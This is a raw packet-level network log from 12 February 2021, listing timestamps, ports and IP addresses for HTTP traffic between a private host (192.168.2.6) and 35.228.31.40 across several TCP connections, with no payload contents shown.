Feb 12, 2021 10:00:42.347381115 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347393036 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.347412109 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.347435951 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.347450018 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.350099087 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.350121975 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.350138903 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.350155115 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.350209951 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.350241899 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.350301027 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.350543976 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.352349997 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.352433920 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.380587101 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.383683920 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.388098955 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388127089 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388149977 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388168097 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388191938 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388212919 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388236046 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388257980 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388267040 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.388278961 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388299942 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388299942 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.388315916 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.388329983 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388350964 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.388354063 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.388372898 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.388395071 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.388421059 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.390598059 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.390623093 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.390644073 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.390665054 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.390686035 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.390712023 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.390779972 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.393107891 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.394576073 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.418672085 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.419306993 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.428744078 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428771973 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428785086 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428802013 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428817987 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428831100 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428843021 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428859949 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428872108 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428884983 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428899050 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428920031 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.428932905 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.428997040 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.429160118 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.430180073 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.431709051 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.431734085 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.431751966 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.431768894 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.431787014 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.431813955 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.431850910 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.433317900 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.433689117 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.461580992 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.465646029 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.471677065 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471707106 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471723080 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471735954 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471750021 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471762896 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471776962 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471795082 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471811056 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471824884 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471837997 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471849918 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.471857071 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.471898079 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.471988916 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.472296000 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.472367048 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.473165989 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473185062 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473201990 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473218918 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473236084 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473253012 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473273039 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473292112 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473308086 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473325014 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473340988 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473352909 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.473543882 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.479836941 CET	49757	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.557658911 CET	80	49757	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.564608097 CET	49756	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.652718067 CET	80	49756	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:42.652837038 CET	49756	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.653143883 CET	49756	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:42.731137037 CET	80	49756	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:45.302828074 CET	49758	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.303621054 CET	49759	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.362874031 CET	49760	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.364304066 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.381479979 CET	80	49759	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:45.381614923 CET	49759	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.383666039 CET	49759	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.383763075 CET	80	49758	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:45.383861065 CET	49758	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.442380905 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:45.442486048 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.443794966 CET	80	49760	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:45.443903923 CET	49760	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.506290913 CET	80	49759	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:45.767699003 CET	80	49759	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:45.767725945 CET	80	49759	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:45.767890930 CET	49759	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:45.991731882 CET	49759	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.048629045 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.069638968 CET	80	49759	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.170768976 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.308439970 CET	49758	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.399348974 CET	80	49758	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.399386883 CET	80	49758	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.399463892 CET	49758	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.399507999 CET	49758	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.399799109 CET	49758	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.465308905 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.465334892 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.465353012 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.465377092 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.465409040 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.465420961 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.465445995 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.465470076 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.465495110 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.480524063 CET	80	49758	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.506062031 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.506088972 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.506103039 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.506114960 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.506160975 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.506206989 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.543467999 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.543502092 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.543525934 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.543538094 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.543545961 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.543566942 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.543589115 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.543616056 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.543616056 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.543642044 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.543663979 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.543672085 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.543692112 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.543723106 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.546022892 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.546056032 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.546097040 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.546118021 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.547772884 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.547914982 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.584225893 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.584253073 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.584266901 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.584283113 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.584299088 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.584314108 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.584316969 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.584326982 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.584337950 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.584351063 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.584382057 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.584430933 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.621557951 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621592045 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621613026 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621633053 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621651888 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621674061 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621694088 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621717930 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621741056 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621759892 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621769905 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.621779919 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621792078 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.621803045 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621804953 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.621824980 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621841908 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.621850014 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.621881962 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.628169060 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628195047 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628216982 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628225088 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.628237009 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628248930 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.628263950 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628281116 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.628287077 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628308058 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628330946 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628353119 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628357887 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.628365040 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.628372908 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.628396034 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.628423929 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.663345098 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.663381100 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.663403988 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.663427114 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.663449049 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.663475990 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.663477898 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.663499117 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.663503885 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.663518906 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.663535118 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.663603067 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.699804068 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.699830055 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.699846983 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.699886084 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.699887991 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.699908018 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.699915886 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.699928045 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.699945927 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.699947119 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.699964046 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.699971914 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.699984074 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.700001001 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.700014114 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.700042963 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.700088024 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.700155973 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.700222969 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.700237989 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.700270891 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.700284958 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.710118055 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710161924 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710187912 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710211992 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710232973 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710253954 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710275888 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.710287094 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710311890 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710335016 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710339069 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.710350990 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.710359097 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710359097 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.710387945 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710395098 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.710411072 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.710448027 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.710464001 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.710472107 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.711885929 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.711911917 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.711934090 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.711963892 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.711977005 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.711987972 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.712022066 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.712043047 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.716406107 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.717333078 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.741748095 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.741883039 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.751442909 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751508951 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751539946 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.751565933 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.751570940 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751624107 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.751636028 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751692057 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751696110 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.751744032 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.751759052 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751826048 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751876116 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751928091 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751955986 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.751983881 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.751997948 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.752039909 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.752041101 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.752093077 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.752094030 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.752146959 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.757184982 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.757246017 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.757298946 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.757344961 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.757349968 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.757363081 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.757402897 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.757433891 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.757488012 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.757491112 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.757541895 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.779201031 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.779442072 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.793473005 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.793545961 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.793579102 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.793615103 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.793668985 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.793715954 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.793719053 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.793767929 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.793773890 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.793793917 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.793831110 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.793832064 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.793884993 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.793940067 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.793945074 CET	49761	80	192.168.2.6	35.228.31.40
Feb 12, 2021 10:00:46.793996096 CET	80	49761	35.228.31.40	192.168.2.6
Feb 12, 2021 10:00:46.794047117 CET	80	49761	35.228.31.40	192.168.2.6
